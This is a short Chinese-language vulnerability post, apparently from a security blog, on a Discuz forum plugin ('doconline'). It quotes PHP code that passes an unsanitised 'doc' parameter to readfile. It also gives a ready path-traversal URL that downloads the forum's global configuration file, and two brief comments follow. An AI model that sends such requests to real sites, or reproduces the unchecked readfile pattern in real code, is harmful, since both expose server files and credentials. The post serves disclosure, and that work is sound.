Discuz某插件任意本地下载漏洞

Author:y0umer 插件的下载地址: http://www.discuz.net/forum.php?mod=viewthread&tid=3169556 然后看代码: [php] $doc=$_GET['doc']; $doc="../../../".$doc; $filename=$_GET['filename']; $ext=$_GET['ext']; //设置文件类型 if($ext=='doc') {$_ext="application/msword";} if($ext=='xls') {$_ext="application/vnd.ms-excel";} if($ext=='ppt') {$_ext="application/vnd.ms-powerpoint";} if($ext=='docx') {$_ext="application/vnd.openxmlformats-officedocument.wordprocessingml.template";} if($ext=='xlsx') {$_ext="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet";} if($ext=='pptx') {$_ext="application/vnd.openxmlformats-officedocument.presentationml.presentation";} if($ext=='pdf') {$_ext="application/pdf";} if($ext=='txt') {$_ext="application/plain";} //设置文件头 header('Content-Disposition: attachment; filename='.$filename); header('Content-Type:'.$_ext); header('Content-Length:'.filesize($doc)); //读取文件 readfile($doc); ?> [/php] $doc居然没经过任何处理就readfile了。。。 http://0day5.com/source/plugin/doconline/doconline.php?doc=/config/config_global_default.php

2 条评论

  1. jon

    没有一个测试成功。这个太鸡肋了

    1. 0day5
      @jon

      本身就是一个鸡肋的不能在鸡肋了

发表评论